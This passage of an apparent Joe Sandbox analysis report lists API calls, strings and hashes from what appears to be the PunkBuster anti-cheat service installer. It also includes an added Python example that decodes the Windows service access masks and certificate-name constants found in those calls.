                                              • Instruction Fuzzy Hash: 6FB1D3B0904158EEDB00EB95CC85FEEBBB9AF08318F65026EF156B32D1D6B85E04C765

                                              Control-flow Graph

                                              • Control-flow graph (rendered as an image; the executed/not-executed colouring is not reproduced): 43 basic blocks from 00439B20 to 00439D65, calling three GDI32 exports that the report names only by address (73A16180, 73A14C40, 73A14D40), CreateIconIndirect, DeleteObject, SelectObject and DeleteDC, plus the internal functions 004BB98C, 00411160, 00439AC0 and 004387D0.
                                              APIs
                                              • 73A16180.GDI32(?,?,00000001,00000001,00000000,?,?,?), ref: 00439B76
                                              • CreateIconIndirect.USER32(?), ref: 00439BD0
                                              • DeleteObject.GDI32(00000000), ref: 00439BD9
                                              • 73A14C40.GDI32(00000000,?,?,?), ref: 00439C9E
                                              • 73A14C40.GDI32(00000000,?,?,?), ref: 00439CA4
                                              • SelectObject.GDI32(00000000,?), ref: 00439CB3
                                              • SelectObject.GDI32(00000000,?), ref: 00439CBF
                                              • 73A14D40.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,008800C6,?,?,?), ref: 00439CEB
                                              • SelectObject.GDI32(00000000,?), ref: 00439CFB
                                              • SelectObject.GDI32(00000000,?), ref: 00439D07
                                              • DeleteDC.GDI32(00000000), ref: 00439D10
                                              • DeleteDC.GDI32(00000000), ref: 00439D13
                                              • CreateIconIndirect.USER32(?), ref: 00439D1A
                                              • DeleteObject.GDI32(?), ref: 00439D4C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: Object$DeleteSelect$CreateIconIndirect$A16180
                                              • String ID:
                                              • API String ID: 224736987-0
                                              • Opcode ID: 3031b414493fbf99951924072cac3069245b3430f50ba7b56301bf550f7ad484
                                              • Instruction ID: 094c13db3d56746c6d184d65fef74c142a1e1cab74018fb28d94c467a2b62b3a
                                              • Opcode Fuzzy Hash: 3031b414493fbf99951924072cac3069245b3430f50ba7b56301bf550f7ad484
                                              • Instruction Fuzzy Hash: 237148B1A04340AFC750DF29D980B6BBBE5AB88B50F14596EF989CB351D7B8DC00CB56

                                              Control-flow Graph

                                              • Control-flow graph (rendered as an image; the executed/not-executed colouring is not reproduced): 23 basic blocks from 004C631B to 004C6491, calling GetModuleFileNameA, GetStdHandle and WriteFile plus the internal functions 004BC19B, 004BBA60, 004BC410, 004BC810, 004BC670, 004BC420 and 004C8324.
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 004C639C
                                              • _strlen.LIBCMT ref: 004C63BC
                                              • _strlen.LIBCMT ref: 004C63CB
                                              • _strlen.LIBCMT ref: 004C63EB
                                              • _strlen.LIBCMT ref: 004C63F8
                                              • _strlen.LIBCMT ref: 004C645E
                                              • GetStdHandle.KERNEL32(000000F4,00510140,00000000,?,00000000,00000000,00000000,00000000), ref: 004C6469
                                              • WriteFile.KERNEL32(00000000), ref: 004C6470
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: _strlen$File$HandleModuleNameWrite
                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                              • API String ID: 1978235431-4022980321
                                              • Opcode ID: d38d5b1406307b8c0532007b35fc3c9b6b7cde0ff306e2b280a830a180febb02
                                              • Instruction ID: 3b83ceba6bd0bb7fa69833b27816d898b07064a94b1dc6de9f3a03ce7699dd3e
                                              • Opcode Fuzzy Hash: d38d5b1406307b8c0532007b35fc3c9b6b7cde0ff306e2b280a830a180febb02
                                              • Instruction Fuzzy Hash: 4231F3765002446ADB24AA758CC6FFE3769EB44308F14882FF952D62A2DE7C9651C72C

                                              Control-flow Graph

                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00407261
                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407283
                                              • OpenServiceA.ADVAPI32(00000000,PnkBstrA,000F01FF), ref: 004072F9
                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00407360
                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00407363
                                              Strings
                                              • Installation canceled. WARNING: The service was *NOT* installed. PunkBuster will not operate correctly without this service., xrefs: 00407312
                                              • Uninstall canceled. WARNING: The service was *NOT* completely removed., xrefs: 00407375
                                              • Message, xrefs: 0040728F
                                              • **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer., xrefs: 0040729C
                                              • PnkBstrA, xrefs: 004072F3
                                              • Installation Canceled, xrefs: 00407305
                                              • Uninstall Canceled, xrefs: 00407368
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Service$CloseHandleOpen$H_prologManager
                                              • String ID: **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer.$Installation Canceled$Installation canceled. WARNING: The service was *NOT* installed. PunkBuster will not operate correctly without this service.$Message$PnkBstrA$Uninstall Canceled$Uninstall canceled. WARNING: The service was *NOT* completely removed.
                                              • API String ID: 4214099978-2742951679
                                              • Opcode ID: 4f6ecb782988e2b6a3b57c5b7547f7bb93300018e594aa3dc937bf7fb3d4cfa2
                                              • Instruction ID: 7c7ffd2bd437f43fbd6496351136866b800a351aa3a6ac2ed06033c121d4f1a4
                                              • Opcode Fuzzy Hash: 4f6ecb782988e2b6a3b57c5b7547f7bb93300018e594aa3dc937bf7fb3d4cfa2
                                              • Instruction Fuzzy Hash: 1A41D770D00259AADB00F7A5CD86EFEB7749B10324F60426EE521731D2DB781B05C66A

                                              Control-flow Graph

                                              APIs
                                              • CertGetNameStringA.CRYPT32(?,00000004,00000001,00000000,00000000,00000000), ref: 0040833E
                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00408351
                                              • CertGetNameStringA.CRYPT32(?,00000004,00000001,00000000,00000000,?), ref: 00408374
                                              • LocalFree.KERNEL32(?), ref: 004083A4
                                              • CertGetNameStringA.CRYPT32(?,00000004,00000000,00000000,00000000,00000000), ref: 004083B9
                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 004083C8
                                              • CertGetNameStringA.CRYPT32(?,00000004,00000000,00000000,00000000,?), ref: 004083E6
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00408423
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00408436
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: CertNameStringTime$Local$AllocFileSystem$Free
                                              • String ID: %02x $Too Large
                                              • API String ID: 1769289905-1084305061
                                              • Opcode ID: b3e0cd638cfef40fa12e70ebb89416793cda090c0583f4495964a5423ace2b5b
                                              • Instruction ID: 6f341e6902c4afdf672d8c9355eb800609bd8c5a6837686ba94cd697f7e6a9e9
                                              • Opcode Fuzzy Hash: b3e0cd638cfef40fa12e70ebb89416793cda090c0583f4495964a5423ace2b5b
                                              • Instruction Fuzzy Hash: 4E51327194025AAFDB219F64CC81FEDB7F8AF08354F0444BAF988A7291D6749E908F58

                                              Control-flow Graph

                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0040997A
                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00409A16
                                              • OpenServiceA.ADVAPI32(00000000,PnkBstrA,000F01FF), ref: 00409AB5
                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00409B16
                                              • CloseServiceHandle.ADVAPI32(?), ref: 00409B1E
                                              Strings
                                              • Message, xrefs: 00409A37
                                              • PunkBuster Service Setup v%d.%d %s - Step 1 of 3, xrefs: 004099BA
                                              • Battlefield Bad Company 2, xrefs: 004099A3
                                              • PunkBuster Service Setup v%d.%d %s - Step 1 of 2, xrefs: 004099C1
                                              • **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer., xrefs: 00409A47
                                              • PnkBstrA, xrefs: 00409AAF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Service$CloseHandleOpen$H_prologManager
                                              • String ID: **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer.$Battlefield Bad Company 2$Message$PnkBstrA$PunkBuster Service Setup v%d.%d %s - Step 1 of 2$PunkBuster Service Setup v%d.%d %s - Step 1 of 3
                                              • API String ID: 4214099978-78031187
                                              • Opcode ID: b44dd2765731aa001f42abd8448489a8d6e3d9e1b7effa639c836654f9df17bb
                                              • Instruction ID: 2e18fc910cd73181aa8cc253c752e22f79e2d0258fc9b51ea5b6ac68f69cd406
                                              • Opcode Fuzzy Hash: b44dd2765731aa001f42abd8448489a8d6e3d9e1b7effa639c836654f9df17bb
                                              • Instruction Fuzzy Hash: EE4173B0A402589FD710EB65CC85FEA77B4AF58304F0040BEF50AA7292DB795E85CB69
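The three records above show the binary opening the Service Control Manager with dwDesiredAccess 000F003F, opening the PnkBstrA service with 000F01FF, and calling CertGetNameStringA twice per name (once with a NULL buffer to learn the length, then again after LocalAlloc). Those raw hex arguments are much easier to triage once decoded. The Python below is an added example, not code from the Joe Sandbox report or from the analysed sample: it parses API lines in the text layout used by these records and decodes the service access masks and the certificate name type and flag against the documented winsvc.h and wincrypt.h constants. The embedded sample listing is copied from the API lines on this page; the regex, the function names and the output wording are this example's own.

```python
"""Decode the API call lines of a Joe Sandbox function record.

Added example for this report page; not code from Joe Sandbox or from the
analysed sample. The constant tables are the documented Windows values from
winsvc.h and wincrypt.h; parse_listing/annotate/decode_mask are names chosen
for this example.
"""
import re
from typing import Dict, List, Optional, Tuple

# Constructed input: API lines copied from the function records on this page.
SAMPLE_LISTING = """\
• __EH_prolog.LIBCMT ref: 00407261
• OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407283
• OpenServiceA.ADVAPI32(00000000,PnkBstrA,000F01FF), ref: 004072F9
• CloseServiceHandle.ADVAPI32(00000000), ref: 00407360
• CertGetNameStringA.CRYPT32(?,00000004,00000001,00000000,00000000,00000000), ref: 0040833E
• LocalAlloc.KERNEL32(00000040,00000000), ref: 00408351
"""

# "<api>.<module>(<args>), ref: <addr>"; the args group is absent for entries
# such as __EH_prolog that the report lists without parameters.
API_LINE = re.compile(
    r"•\s*(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Generic rights shared by every securable object (STANDARD_RIGHTS_REQUIRED = 0xF0000).
STANDARD_RIGHTS = {0x10000: "DELETE", 0x20000: "READ_CONTROL",
                   0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER"}
# Object-specific rights for OpenSCManager (SC_MANAGER_ALL_ACCESS = 0xF003F).
SC_MANAGER_RIGHTS = {0x1: "SC_MANAGER_CONNECT", 0x2: "SC_MANAGER_CREATE_SERVICE",
                     0x4: "SC_MANAGER_ENUMERATE_SERVICE", 0x8: "SC_MANAGER_LOCK",
                     0x10: "SC_MANAGER_QUERY_LOCK_STATUS", 0x20: "SC_MANAGER_MODIFY_BOOT_CONFIG"}
# Object-specific rights for OpenService (SERVICE_ALL_ACCESS = 0xF01FF).
SERVICE_RIGHTS = {0x1: "SERVICE_QUERY_CONFIG", 0x2: "SERVICE_CHANGE_CONFIG",
                  0x4: "SERVICE_QUERY_STATUS", 0x8: "SERVICE_ENUMERATE_DEPENDENTS",
                  0x10: "SERVICE_START", 0x20: "SERVICE_STOP", 0x40: "SERVICE_PAUSE_CONTINUE",
                  0x80: "SERVICE_INTERROGATE", 0x100: "SERVICE_USER_DEFINED_CONTROL"}
# dwType values accepted by CertGetNameString.
CERT_NAME_TYPES = {1: "CERT_NAME_EMAIL_TYPE", 2: "CERT_NAME_RDN_TYPE", 3: "CERT_NAME_ATTR_TYPE",
                   4: "CERT_NAME_SIMPLE_DISPLAY_TYPE", 5: "CERT_NAME_FRIENDLY_DISPLAY_TYPE",
                   6: "CERT_NAME_DNS_TYPE", 7: "CERT_NAME_URL_TYPE", 8: "CERT_NAME_UPN_TYPE"}
CERT_NAME_ISSUER_FLAG = 0x1


def hex_arg(arg: str) -> Optional[int]:
    """Return the integer value of a hex argument, or None for '?' / symbolic args."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]+", arg) else None


def decode_mask(value: int, rights: Dict[int, str]) -> List[str]:
    """Split an access mask into its named bits; leftover bits are reported as UNKNOWN."""
    names, remaining = [], value
    for bit, name in sorted({**rights, **STANDARD_RIGHTS}.items()):
        if remaining & bit:
            names.append(name)
            remaining &= ~bit
    if remaining:
        names.append(f"UNKNOWN_{remaining:#x}")
    return names


def parse_listing(text: str) -> List[Dict[str, object]]:
    """Turn report API lines into records: api, module, args (as strings), ref (int)."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        raw = m.group("args")
        calls.append({"api": m.group("api"), "module": m.group("module"),
                      "args": [a.strip() for a in raw.split(",")] if raw else [],
                      "ref": int(m.group("ref"), 16)})
    return calls


def annotate(calls: List[Dict[str, object]]) -> List[Tuple[int, str, str]]:
    """Explain the arguments of the calls whose constants are worth decoding."""
    notes = []
    for c in calls:
        api, args = c["api"], c["args"]
        if api == "OpenSCManagerA" and len(args) == 3 and hex_arg(args[2]) is not None:
            notes.append((c["ref"], api, "dwDesiredAccess="
                          + "|".join(decode_mask(hex_arg(args[2]), SC_MANAGER_RIGHTS))))
        elif api == "OpenServiceA" and len(args) == 3 and hex_arg(args[2]) is not None:
            notes.append((c["ref"], api, f"lpServiceName={args[1]!r} dwDesiredAccess="
                          + "|".join(decode_mask(hex_arg(args[2]), SERVICE_RIGHTS))))
        elif api == "CertGetNameStringA" and len(args) == 6:
            dw_type, dw_flags = hex_arg(args[1]), hex_arg(args[2])
            if dw_type is None or dw_flags is None:
                continue
            who = "issuer" if dw_flags & CERT_NAME_ISSUER_FLAG else "subject"
            text = f"{CERT_NAME_TYPES.get(dw_type, dw_type)} of {who}"
            # pszNameString == NULL with cchNameString == 0 is the documented length query
            # that precedes the real call (the LocalAlloc + second call in the record above).
            if args[4] == "00000000" and args[5] == "00000000":
                text += ", length query (pszNameString=NULL)"
            notes.append((c["ref"], api, text))
    return notes


if __name__ == "__main__":
    for ref, api, text in annotate(parse_listing(SAMPLE_LISTING)):
        print(f"{ref:08X} {api}: {text}")
```

Both masks decode to the full ALL_ACCESS sets with no leftover bits, which is consistent with an installer that expects to run elevated (the adjacent "Please make sure you are the administrator" string says the same). Leftover bits, or a service name other than PnkBstrA, would be the first thing to look at when a record deviates from this legitimate PunkBuster setup code.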

                                              Control-flow Graph

                                              [Control-flow graph of the function at 00439740, rendered as an image in the report (legend: Executed / Not Executed); the basic-block edge list is not reproduced here]
                                              APIs
                                              • DeleteObject.GDI32(?), ref: 0043976E
                                              • 73A16180.GDI32(?,?,00000001,00000001,00000000,?,?), ref: 004397DF
                                              • 73A14C40.GDI32(00000000,?,?), ref: 004397F0
                                              • 73A14C40.GDI32(00000000,?,?), ref: 004397F6
                                              • SelectObject.GDI32(00000000,00000000), ref: 00439811
                                              • SelectObject.GDI32(00000000,?), ref: 00439828
                                              • SetBkColor.GDI32(00000000,00000000), ref: 00439842
                                              • 73A14D40.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00330008), ref: 00439861
                                              • SelectObject.GDI32(00000000,?), ref: 0043986D
                                              • DeleteDC.GDI32(00000000), ref: 00439876
                                              • SelectObject.GDI32(00000000,?), ref: 0043987E
                                              • DeleteDC.GDI32(00000000), ref: 00439881
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Object$Select$Delete$A16180Color
                                              • String ID:
                                              • API String ID: 889182881-0
                                              • Opcode ID: ccb191d75c6a88419337b361c2f1c9a35ab3d4fcbf024475c7a481866e01d812
                                              • Instruction ID: 49661b4580e29581968163e5db868791f49a386c690e782eba182ce59999159b
                                              • Opcode Fuzzy Hash: ccb191d75c6a88419337b361c2f1c9a35ab3d4fcbf024475c7a481866e01d812
                                              • Instruction Fuzzy Hash: AA417935644350AFD300DF54D884F6BBBE8BB8DB00F14855AF9889B342C7B8EC058BA6

                                              Control-flow Graph

                                              [Control-flow graph of the function at 004079B5, rendered as an image in the report (legend: Executed / Not Executed); the basic-block edge list is not reproduced here]
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 004079BA
                                                • Part of subcall function 004079B5: __EH_prolog.LIBCMT ref: 004078BB
                                              Strings
                                              • install-nooverwrite, xrefs: 00407D34
                                              • **ERROR: You must specify install or un-install when using the no-display command-line switch., xrefs: 00407C45
                                              • Message, xrefs: 00407938, 00407B1E, 00407C38
                                              • no-display, xrefs: 00407B79
                                              • no-prompts, xrefs: 00407A5B
                                              • skip-tests, xrefs: 00407CA9
                                              • **ERROR: You must specify install or un-install when using the no-prompts command-line switch., xrefs: 00407B2E
                                              • **ERROR: Error in command-line option specified., xrefs: 00407925, 00407945
                                              • install-dlls, xrefs: 00407CE9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: **ERROR: You must specify install or un-install when using the no-display command-line switch.$ **ERROR: You must specify install or un-install when using the no-prompts command-line switch.$ **ERROR: Error in command-line option specified.$Message$install-dlls$install-nooverwrite$no-display$no-prompts$skip-tests
                                              • API String ID: 3519838083-2197801583
                                              • Opcode ID: c8681db5e3eba06fd4c152a01befb50f4238c0d281412fb061c6c0f0b5522ca5
                                              • Instruction ID: b915994dbbd29f52d1ea4df70baef6de42778e44b1b756d3316263f1e49830fe
                                              • Opcode Fuzzy Hash: c8681db5e3eba06fd4c152a01befb50f4238c0d281412fb061c6c0f0b5522ca5
                                              • Instruction Fuzzy Hash: AEB1A130D05289EEDB00EF61C945BED7BB4AF11304F50406FE885272E2DBB86B49CB99
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00401DA7
                                                • Part of subcall function 004016A9: __EH_prolog.LIBCMT ref: 004016AE
                                              Strings
                                              • dialog, xrefs: 00401DB6
                                              • button, xrefs: 00401F6A, 00402012
                                              • I &Agree, xrefs: 00401F7B
                                              • n, xrefs: 00402055
                                              • SOFTWARE LICENSE AGREEMENTThe terms of this Software License Agreement (this "Agreement") shall apply to all versions, editions, and future updates of PunkBuster software and constitute a legal agreement between you (the "Licensee") and Even Balance, Inc. (t, xrefs: 00401F20
                                              • text, xrefs: 00401E79
                                              • PunkBuster End User License Agreement, xrefs: 00401DCA
                                              • I &Disagree, xrefs: 00402023
                                              • , xrefs: 0040206C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmp
